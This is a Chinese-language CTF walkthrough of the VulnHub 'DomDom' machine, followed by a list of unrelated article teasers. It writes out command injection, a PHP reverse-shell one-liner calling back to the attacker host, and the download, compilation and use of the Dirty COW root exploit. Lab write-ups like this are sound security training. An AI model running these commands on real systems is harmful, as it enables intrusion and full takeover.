靶机测试DomDom笔记

news2024/12/24 8:51:00

靶机描述

Back to the Top

How well do you understand PHP programs? How familiar are you with Linux misconfigurations? This image will cover advanced Web attacks, out of the box thinking and the latest security vulnerabilities.

Please note that this is capture the flag machine which means it is not real life scenario but will challenge you hard before you can obtain root privileges.

靶机地址

https://www.vulnhub.com/entry/domdom-1,328/

靶机测试

扫描端口

$ nmap -p- -A 1.92 ( https://nmap.org ) at 2023-01-11 09:29 CST
Nmap scan report for 192.168.1.100
Host is up (0.0011s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: DomDom
|_http-server-header: Apache/2.4.18 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.68 seconds
zsh: segmentation fault  nmap -p- -A 192.168.1.100 -oA dom

开放80端口

目录扫描

python .\dirsearch.py -u "http://192.168.1.100/" --extensions extensions

访问网站目录

命令执行漏洞

登录抓包重放,发现命令执行漏洞

cmd=id

nc反弹shell

nc -lnvp 9001
php -r '$sock=fsockopen("192.168.1.53",9001);exec("/bin/sh -i <&3 >&3 2>&3");'

切换交互shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

解决shell乱码问题,这个问题试了好久,kali上的默认shell是zsh

所以,我们先切换shell

bash

然后nc监听

nc -lnvp 9001

之后反弹shell

php -r '$sock=fsockopen("192.168.1.53",9001);exec("/bin/sh -i <&3 >&3 2>&3");'

再然后获得交互shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

然后Ctrl+Z,把shell放到后台,在执行

stty -echo raw

最后fg调出后来任务,回车得到无乱码的交互式shell。

提权

本机开启个web服务,让靶机下载提权检测脚本

└─$ python3 -m http.server 80              
wget http://192.168.1.53/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

直接脏牛提权

下载提权脚本,编译执行

https://github.com/cryptopuzzle/cowroot

wget http://192.168.1.53/cowroot.c
gcc cowroot.c -o cowroot -pthread
./cowroot

查找特殊权限的文件

getcap -r / 2>/dev/null

打包用户 domom 目录

tar -cvf domom.tar /home/domom

查看root密码

登录root用户

古有一言腰相印,谁教他、满箧婴鳞疏。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/154866.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

阿里云中MindOpt优化器在python中如何安装

文章目录1 背景2 目的3 Bug4 安装教程6 小丑竟是我自己1 背景 我需要本地下载安装使用阿里元的MindOpt&#xff0c;安装教程可以看官网说明文档&#xff08;方方面面都有&#xff0c;不过细节部分有点欠缺&#xff0c;可能会踩一些坑&#xff0c;但总体问题不大&#xff09;。…

盘点 | CES2023落幕!新能源车、显示技术、AI/元宇宙、芯片…百花齐放百家争鸣中……

美国时间1月8日&#xff0c;全球规模最大、水平最高、影响力最广泛的国际消费电子展&#xff08;CES 2023&#xff09;在美国拉斯维加斯闭幕。这场堪比科技“春晚”的消费电子盛宴以“技术如何应对世界上最大的挑战”为主题&#xff0c;来自全球170多个国家与地区的3200余家科技…

OpenResty(Nginx+Redis+Lua)实现缓存限流

OpenResty介绍 OpenResty(又称&#xff1a;ngx_openresty) 是一个基于 nginx的可伸缩的 Web 平台&#xff0c;由中国人章亦春发起&#xff0c;提供了很多高质量的第三方模块。 OpenResty 是一个强大的 Web 应用服务器&#xff0c;Web 开发人员可以使用 Lua 脚本语言调动 Ngin…

2013-2021年核心城市空气质量日度数据

2013-2021年核心城市空气质量日度数据 1、时间&#xff1a;2013年12月-2021年4月13日 2、城市包括&#xff1a;北京 上海 广州 深圳 杭州 天津 成都 南京 西安 武汉 3、指标&#xff1a;日期、AQI、范围、质量等级、PM2.5、PM10、SO2、CO、NO2、O3、城市 4、来源&#xff1…

MYSQL基础——DML语句

DML语句 DML英文全称是Data Manipulation Language(数据操作语言)&#xff0c;用来对数据库中表的数据进行增(INSERT)、删(DELETE)、改(UPDATE)操作。 接下来代码演示所用的数据表如下&#xff1a; desc employee; 添加 添加数据语法格式如下&#xff1a; # 给指定字段添加…

IEEE | DSConv: Efficient Convolution Operator

论文标题 &#xff1a;DSConv: Efficient Convolution Operator 论文链接 &#xff1a;https://arxiv.org/abs/1901.01928v2 发表时间 &#xff1a;2019年11月 创新点 实现更低的内存使用&#xff0c;并且加快了计算速度 概要 引入了一种称为 DSConv&#xff08;分布移位卷…

【服务器数据恢复】服务器卷被误删除的raid5数据恢复案例

服务器数据恢复环境&故障&#xff1a; 某品牌服务器&#xff0c;搭建raid5磁盘阵列。 用户误操作删除服务器上的卷。 经过检测发现服务器不存在物理故障&#xff0c;可以从raid5磁盘阵列层面进行数据恢复。 服务器数据恢复过程&#xff1a; 1、对故障服务器所有硬盘以只读…

Chromedriver安装教程【无需翻墙】

第一步 查看你当前Chrome浏览器的版本&#xff0c;如下图所示&#xff1a; 第二步 查看当前Chrome浏览器的版本号&#xff0c;如下图所示,版本 108.0.5359.125&#xff08;正式版本&#xff09; &#xff08;64 位&#xff09;中的&#xff0c;108就是我们的版本号。 第三…

第47讲:SQL优化之主键优化

文章目录1.主键优化方面的概念1.1.数据的组织方式1.2.主键顺序写入的过程1.3.主键乱序写入引发页分裂的现象1.4.页合并的概念2.主键的设计原则1.主键优化方面的概念 1.1.数据的组织方式 在InnoDB存储引擎中&#xff0c;表的数据都是根据主键顺序组织然后存放的&#xff0c;这…

集成开发工具IDEA导入新项目,update index时间过长

集成开发工具IDEA导入新项目&#xff0c;update index时间过长&#xff0c;一般这种场景出现在&#xff1a; 1.继承开发工具比较新&#xff08;使用了优化的索引算法&#xff0c;这种算法一般是前期编译比较慢&#xff0c;一旦编译完&#xff0c;存入缓存&#xff0c;后期搜索就…

为何国家应该大力推行IPV9而不是IPv6.md

不得不说,中国的发展突飞猛进,你看连神舟16号都已经提升了日程。 我们见证了中国的崛起,更见证了中国的力量,集中力量办大事的决心。 当然计算机网络体系也发生了很大的改变,从之前的IPv4到20年前的IPv6的提出,再到现在的IPV9技术的商业实施。 为何IPv6提出了20多年了,普及还是…

11点还不睡会错过肝脏排毒吗?

人体脏器有排毒时间这个说法由来已久&#xff0c;肝经循行时间为晚上11点-1点&#xff0c;这让很多人害怕自己在11点还没睡就会错过肝脏排毒的时间。这个说法是真的吗&#xff1f;肝脏作为人体的“生物加工厂”&#xff0c;24小时都在工作。工作内容包括调节代谢、合成、调节免…

JSONArray.parseArray

1. 需求 最近有个需求&#xff1a; 要接收某个接口的 JSON 数据&#xff0c;而这个JSON数据有可能是一个 JSON 对象&#xff0c;也有可能是一个 JSON数组。 "{name,王五,age:10}""[{name:张三,age:12},{name:李四,age:11}]"现在呢&#xff0c;我需要根据…

指令+运算=CPU

1 组合逻辑电路&#xff08;Combinational Logic Circuit&#xff09; 要实现完整CPU功能&#xff0c;除加法器这种电路&#xff0c;还需实现其他功能的电路。有这样一种电路&#xff0c;类似加法器&#xff0c;给定输入&#xff0c;就能得到固定输出。 但仅有组合逻辑电路还…

在风速、风向传感器中,比聚碳酸酯复合材料更好的壳体是哪个?

现如今&#xff0c;铝合金产品在电子行业&#xff0c;已经成为主流产品之一&#xff0c;适用范围广&#xff0c;在各个行业都有普及&#xff0c;其中就包括气象领域。其中&#xff0c;风速、风向变送器为气象仪器&#xff0c;也随着时代的发展&#xff0c;不断更新换代&#xf…

大一计算机新生,感觉什么都学不会怎么办?

虽然今天什么都没做&#xff0c;但是还是辛苦我了。。。刚开始难是正常现象&#xff0c;可以先梳理一下 计算基础基础很重要&#xff0c;实践为上 计算机组成与原理、数据结构、计算机网络、操作系统、编程语言 书看得越多&#xff0c;其实你越能找到自己的方向&#xff0c;一…

“数实融合” 新时代,解读数据治理的新风向

导语 | 数据作为国际数字主权竞争的核心资源&#xff0c;是国家明确增列的新型生产要素。数据质量的高低、数据价值的挖掘&#xff0c;是影响企业发展的关键要素之一。今天我们邀请到了中国信息通信研究院 大数据与区块链部副主任、腾讯云 TVP 姜春宇老师&#xff0c;带领我们解…

C 中的变量作用域 – 局部和全局作用域解释

在编程中&#xff0c;您经常需要处理变量的范围。变量的作用域决定了是否可以在特定代码块内访问和修改它。 在本教程中&#xff0c;你将了解 C 编程语言中的变量作用域。您将看到一些代码示例&#xff0c;以帮助您了解局部变量和全局变量之间的差异。 目录 变量的作用域是什…

react源码解析3.react源码架构

这一章的目的是让我们认识一下react源码架构和各个模块。 在真正的代码学习之前&#xff0c;我们需要在大脑中有一个react源码的地图&#xff0c;知道react渲染的大致流程和框架&#xff0c;这样才能从上帝视角看react是怎么更新的&#xff0c;来吧少年。 react的核心可以用u…

头条权重如何在线查询,头条权重为0怎么办

每个用心用自媒体的创作者们&#xff0c;都听说过权重一说&#xff0c;权重高&#xff0c;也就意味着你的这个账号属于优质账号&#xff0c;推荐量会相应增加&#xff0c;还有一些自媒体会有创作者账号的白名单&#xff0c;优质账号会放在白名单里。 头条权重如何在线查询&…